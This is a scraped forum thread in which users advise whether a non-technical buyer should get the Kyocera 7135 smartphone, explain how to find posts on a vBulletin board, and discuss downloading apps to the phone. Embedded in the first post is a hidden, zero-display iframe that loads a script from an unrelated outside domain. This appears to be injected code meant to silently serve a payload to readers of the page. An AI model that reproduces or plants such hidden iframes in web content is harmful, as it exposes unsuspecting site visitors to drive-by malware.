I am not incredibly technologically adept, but I do have some idea of what I am doing. I currently have a Startac and Palm V. I really want to get the 7135, but the question I have is if you are not a "techie", does it make sense?<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

1. Do you carry two devices at once?
2. Does one device go on your hip and the other go into a pocket?
3. Ever notice how have it is to fit a Palm comfortably in the pocket of your jeans?
4. Do you connect to the internet using a cellphone, Palm, and a cable or IR?
5. Would you LIKE to be able to connect ot the internet while out on the road?
6. Do you want to have a MP3 player?
7. Have you ever felt the love of another ... never mind. Bad movie.
Anyway, if you answered yes to any of the above, then you might want to consider the 7135.
Technological adeptness shouldn't really be a consideration. If you are not an "adept", you might want to hold back a couple of weeks after release. I am positive that there wil be teething problems with the device, and it might be better for those on the bleeding edge to solve them before jumping in (especially since it sounds like you already have a workable alternative) ... having said that, there are a number who already have the unit, and appear to be more than happy with them. The fact that Verizon has delayed release bodes well for the release of a stable, trouble free product.
Thanks - I have been reading aboutn the phoen for months, following the board, and getting realy excited to get it - just want to make sure I am doing the right thing. As I said in my earlier post, where can I find my post - I dont know where it is.

The only posts I can see from you are in this thread. Could you have registered under another name in the past? as you can see under your name (in the left hand column), you see your post count - as I type this, it says "3". Also, clicking on the search button at the bottom of your post, it will find all messages from the user who wrote the message.
Lots of tricks, but the software this forum is hosted on (vBulletin) is used by a lot of differetn mesage boards. You'll get used to it after awhile
Thanks - can I see it if I go to the main board "Sticky - got one . . . "? Do you have the 7135? Do you like it? Can you download apps directly from the internet to the phone without having to use your computer.?

I believe you can-- however you would need extra software to handle the download and extracting the PRC from a ZIP file--- One possible solution might be Teal Agent:
